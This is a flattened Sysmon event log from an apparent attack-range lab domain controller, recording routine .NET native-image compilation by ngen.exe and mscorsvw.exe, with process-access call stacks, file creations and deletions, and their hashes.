21:02:07.226{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A14F-60D3-DB02-00000000CF01}6544C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019467Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:07.211{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A14F-60D3-DB02-00000000CF01}6544C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019466Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:02:07.211{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A14F-60D3-DB02-00000000CF01}6544C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019465Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:07.148{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019464Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:02:07.148{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019463Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:07.148{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019462Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:02:07.148{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019461Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:07.148{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019460Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:02:07.148{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019459Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:07.148{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019458Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:02:07.148{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019457Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:07.148{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019456Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:02:07.148{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019455Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:07.148{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019454Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:02:09.148{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A151-60D3-E102-00000000CF01}6856C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019498Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:09.117{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A151-60D3-E002-00000000CF01}6800C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000019497Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:09.101{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A151-60D3-E002-00000000CF01}6800C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019496Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:09.101{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A151-60D3-E002-00000000CF01}6800C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL
+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000019495Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:09.023{4DB9351A-A150-60D3-DF02-00000000CF01}4832NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\S8V8F9RM0Z\UIAutomationProvider.ni.dll.auxMD5=9DA4CCB364E51A8E33B5D3B79C9520B4,SHA256=41F68A796D32B90974A78C449660C6EAFE56A4E3DA61FBD939917B5159C2CADF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019494Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:09.023{4DB9351A-A150-60D3-DF02-00000000CF01}4832NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\S8V8F9RM0Z\UIAutomationProvider.ni.dllMD5=94757D3805032FF0720BB522BF7ED731,SHA256=5B384EBFD968FCF5E10F2726296D3A555429C91E481A87553462167510492734,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000019493Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:02:09.008{4DB9351A-A150-60D3-DF02-00000000CF01}4832C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\12e0-0\UIAutomationProvider.dll2021-06-23 21:02:09.008 10341000x800000000000000019540Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:02:10.950{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A152-60D3-EA02-00000000CF01}5176C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019539Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:10.919{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A152-60D3-EA02-00000000CF01}5176C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019538Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:02:10.919{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A152-60D3-EA02-00000000CF01}5176C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019537Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:10.794{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A152-60D3-E902-00000000CF01}6452C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000019536Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:10.763{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A152-60D3-E902-00000000CF01}6452C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019535Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:10.763{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A152-60D3-E902-00000000CF01}6452C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL
+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000019534Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:10.700{4DB9351A-A152-60D3-E802-00000000CF01}3256NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\1IQQNJZTO5\XamlBuildTask.ni.dll.auxMD5=E54ED8F0B4B0EC6835D8EACD4942D994,SHA256=052969D57B72B8F06836E7363BFE26F53A4851B0F8337A0F1B2B9E0863A8B276,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019533Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:10.700{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2ADF12276DECD99CD0E321A5A02EF089,SHA256=EFDDD3FDFF9B0C5C893031C237435C23052DF65646EAEFB626F328F2F56F0030,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019532Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:10.700{4DB9351A-A152-60D3-E802-00000000CF01}3256NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\1IQQNJZTO5\XamlBuildTask.ni.dllMD5=27CB5817FF16B670DEB6F7376D47798C,SHA256=88A18B2C41E9B0F7E4F31A638F27A694974E652AE06392C76DFE29F0CB56C23F,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000019531Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:02:10.685{4DB9351A-A152-60D3-E802-00000000CF01}3256C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\cb8-0\XamlBuildTask.dll2021-06-23 21:02:10.685 10341000x800000000000000019530Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
